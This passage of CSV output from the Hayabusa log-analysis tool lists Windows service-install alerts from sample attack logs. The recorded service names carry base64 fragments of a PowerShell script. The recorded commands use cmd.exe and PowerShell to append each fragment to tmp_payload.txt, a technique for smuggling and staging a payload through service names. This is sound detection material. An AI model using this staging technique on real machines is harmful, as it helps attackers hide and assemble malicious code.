ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:53.026 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 